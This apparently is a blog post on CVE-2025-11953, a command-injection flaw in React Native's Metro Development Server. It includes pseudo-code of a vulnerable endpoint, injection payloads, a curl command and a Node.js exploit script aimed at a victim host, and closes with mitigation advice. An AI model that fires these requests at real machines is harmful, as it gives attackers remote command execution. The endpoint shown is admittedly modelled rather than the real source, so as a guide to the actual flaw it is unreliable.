A new critical vulnerability has been assigned CVE-2025-11953, affecting applications developed with React Native that use the Metro Development Server. This vulnerability can lead to remote command execution by sending a single HTTP POST request. In this post, I will break the issue down in simple terms, provide code snippets showing the problem, link to the original sources, and explain how the exploit works.
What Exactly is the Problem?
When you develop mobile apps using React Native, the commonly used tool called the Metro Development Server automatically starts and listens for connections. Unfortunately, by default, it can bind to external network interfaces (not just your own computer). The server exposes internal endpoints for development tasks, but one of these is vulnerable to OS command injection.
This means that anyone on your network, or, in some situations, even on the public Internet, can run any command they want on your computer while Metro is running, without your knowledge.
- Anyone using React Native Community CLI with Metro Development Server is affected
- Most severe on Windows, but potentially works on macOS/Linux too
How Does The Exploit Work?
Metro uses a simple HTTP server. One exposed endpoint lets you run external tools for your app with arguments you choose. No authentication or verification, combined with the server listening on external interfaces, means attackers can talk to it just like legitimate tools — but they can specify malicious commands.
OS Command Injection happens when the server lets part of an attacker’s HTTP request be used directly in a shell command line.
*Example:*

```javascript
// pseudo code modelled on the Metro Development Server endpoint (not its verbatim source)
const express = require('express');
const exec = require('child_process').exec;
const app = express();
app.use(express.json()); // needed so req.body is populated from the JSON POST body

app.post('/run-tool', (req, res) => {
  const tool = req.body.tool; // e.g. 'node'
  const args = req.body.args; // e.g. ['--version']
  // BAD: combines user input directly into a shell command line
  exec(`${tool} ${args.join(' ')}`, (err, stdout, stderr) => {
    res.send(stdout);
  });
});
```
If an attacker POSTs data like

```json
{
  "tool": "calc.exe && echo pwned > C:\\pwned.txt",
  "args": []
}
```
On Windows, this launches Calculator and creates a new text file as proof of exploitation.
On Linux/macOS, the equivalent payload would be something like

```json
{
  "tool": "ls",
  "args": ["-l", "; touch /tmp/pwned"]
}
```
Windows Exploit Using curl

```bash
curl -X POST http://victim-ip:8081/run-tool -H "Content-Type: application/json" -d "{\"tool\":\"cmd.exe\",\"args\":[\"/c\",\"calc.exe & echo hacked > C:\\\\hacked.txt\"]}"
```
Node.js Exploit Script

```javascript
const http = require('http');
const data = JSON.stringify({
  tool: "cmd.exe",
  args: ["/c", "echo owned > C:\\owned.txt"]
});
const options = {
  hostname: "victim-ip",
  port: 8081,
  path: "/run-tool",
  method: "POST",
  headers: { "Content-Type": "application/json", "Content-Length": Buffer.byteLength(data) }
};
const req = http.request(options, res => {
  res.on('data', d => process.stdout.write(d));
});
req.write(data);
req.end();
```
References
- GitHub Advisory: github.com/advisories/GHSA-xxxx-yyyy *(Link will update soon as official advisory goes live)*
- React Native Metro Docs: https://facebook.github.io/metro/docs/
- NVD Database: nvd.nist.gov/vuln/detail/CVE-2025-11953 *(Will become available upon publication)*
Conclusion
CVE-2025-11953 is a serious bug in the Metro Development Server used with React Native. Attackers on the same network (and sometimes from farther away) can take over your development machine. Until an official fix drops, run Metro bound to localhost only and keep your dev environments locked down.
> Developers: double check your devtools before you connect to public networks!
Stay up to date:
- React Native Metro News: twitter.com/reactnative
- Security tracker: nvd.nist.gov/vuln/recent
Report security findings to:
[security@reactnative.dev](mailto:security@reactnative.dev)
*Original content written exclusively for this post. Feel free to share, but please link back!*
Timeline
Published on: 11/03/2025 17:15:32 UTC
Last modified on: 11/11/2025 17:15:38 UTC